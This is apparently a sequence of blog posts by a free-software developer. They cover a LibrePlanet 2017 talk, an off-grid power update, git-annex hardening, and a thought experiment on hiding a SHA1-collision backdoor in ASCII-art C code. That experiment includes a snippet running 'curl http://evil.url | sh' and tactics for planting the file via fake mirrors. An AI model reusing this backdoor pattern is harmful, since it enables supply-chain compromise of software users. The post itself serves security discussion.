Presenting at LibrePlanet 2017

I've gotten in the habit of going to the FSF's LibrePlanet conference in Boston. It's a very special conference, much wider ranging than a typical technology conference, solidly grounded in software freedom, and full of extraordinary people. (And the only conference I've ever taken my Mom to!)

After attending for four years, I finally thought it was time to perhaps speak at it.

Four keynote speakers will anchor the event. Kade Crockford, director of the Technology for Liberty program of the American Civil Liberties Union of Massachusetts, will kick things off on Saturday morning by sharing how technologists can enlist in the growing fight for civil liberties. On Saturday night, Free Software Foundation president Richard Stallman will present the  Free Software Awards and discuss pressing threats and important opportunities for software freedom.

Day two will begin with Cory Doctorow, science fiction author and special consultant to the Electronic Frontier Foundation, revealing how to eradicate all Digital Restrictions Management (DRM) in a decade. The conference will draw to a close with Sumana Harihareswara, leader, speaker, and advocate for free software and communities, giving a talk entitled "Lessons, Myths, and Lenses: What I Wish I'd Known in 1998."

That's not all. We'll hear about the GNU philosophy from Marianne Corvellec of the French free software organization April, Joey Hess will touch on encryption with a talk about backing up your GPG keys, and Denver Gingerich will update us on a crucial free software need: the mobile phone.

Others will look at ways to grow the free software movement: through cross-pollination with other activist movements, removal of barriers to free software use and contribution, and new ideas for free software as paid work.

-- Here's a sneak peek at LibrePlanet 2017: Register today!

I'll be giving some varient of the keysafe talk from Linux.Conf.Au. By the way, videos of my keysafe and propellor talks at Linux.Conf.Au are now available, see the talks page.

early spring

Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up.

Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before.

Also, turned out that both of my laptop DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually figured it out and got them replaced. (This may have contributed the the cliff earier; seemed to be worst when house voltage was low.)

Soon, 6 months of more power than I can use..

Previously: battery bank refresh late summer the cliff

SHA1 collision via ASCII art

Happy SHA1 collision day everybody!

If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files.

The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\

(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.)

Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks.

The "good" data chunk might then look like this:


And the "bad" data chunk like this:


Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is.

Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:

3*/LN  \.A
5*\LN   \.
5*\7N   /.
3*/7N  /.V

Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:

/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.

/* Call this at the top of main() */
check_display_easter_egg (char **argv) {
    if (strcmp(argv[1], "--easter-egg") == 0)
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url | sh");

Now, you need a C ofuscation person, to make that backdoor a little less obvious. (Hint: Add code to to fix the newlines, paint additional ASCII sprites over top of the static art, etc, add animations, and bury the shellcode in there.)

After a little work, you'll have a C file that any project would like to add, to be able to display a great easter egg ASCII art. Submit it to a project. Submit different versions of it to 100 projects! Everything after line 3 can be edited to make lots of different versions targeting different programs.

Once a project contains the first 3 lines of the file, followed by anything at all, it contains a SHA1 collision, from which you can generate the bad version by swapping in the bad data chuck. You can then replace the good file with the bad version here and there, and noone will be the wiser (except the easter egg will display the "bad" first line before it roots them).

Now, how much more expensive would this be than today's SHA1 attack? It needs a way to generate collisions using only printable ASCII. Whether that is feasible depends on the implementation details of the SHA1 attack, and I don't really know. I should stop writing this blog post and read the rest of the paper.

You can pick either of these two lessons to take away:

  1. ASCII art in code is evil and unsafe. Avoid it at any cost. apt-get moo

  2. Git's security is getting broken to the point that ASCII art (and a few hundred thousand dollars) is enough to defeat it.

My work today investigating ways to apply the SHA1 collision to git repos (not limited to this blog post) was sponsored by Thomas Hochstein on Patreon.

making git-annex secure in the face of SHA1 collisions

git-annex has never used SHA1 by default. But, there are concerns about SHA1 collisions being used to exploit git repositories in various ways. Since git-annex builds on top of git, it inherits its foundational SHA1 weaknesses. Or does it?

Interestingly, when I dug into the details, I found a way to make git-annex repositories secure from SHA1 collision attacks, as long as signed commits are used (and verified).

When git commits are signed (and verified), SHA1 collisions in commits are not a problem. And there seems to be no way to generate usefully colliding git tree objects (unless they contain really ugly binary filenames). That leaves blob objects, and when using git-annex, those are git-annex key names, which can be secured from being a vector for SHA1 collision attacks.

This needed some work on git-annex, which is now done, so look for a release in the next day or two that hardens it against SHA1 collision attacks. For details about how to use it, and more about why it avoids git's SHA1 weaknesses, see

My advice is, if you are using a git repository to publish or collaborate on binary files, in which it's easy to hide SHA1 collisions, you should switch to using git-annex and signed commits.

PS: Of course, verifying gpg signatures on signed commits adds some complexity and won't always be done. It turns out that the current SHA1 known-prefix collision attack cannot be usefully used to generate colliding commit objects, although a future common-prefix collision attack might. So, even if users don't verify signed commits, I believe that repositories using git-annex for binary files will be as secure as git repositories containing binary files used to be. How-ever secure that might be..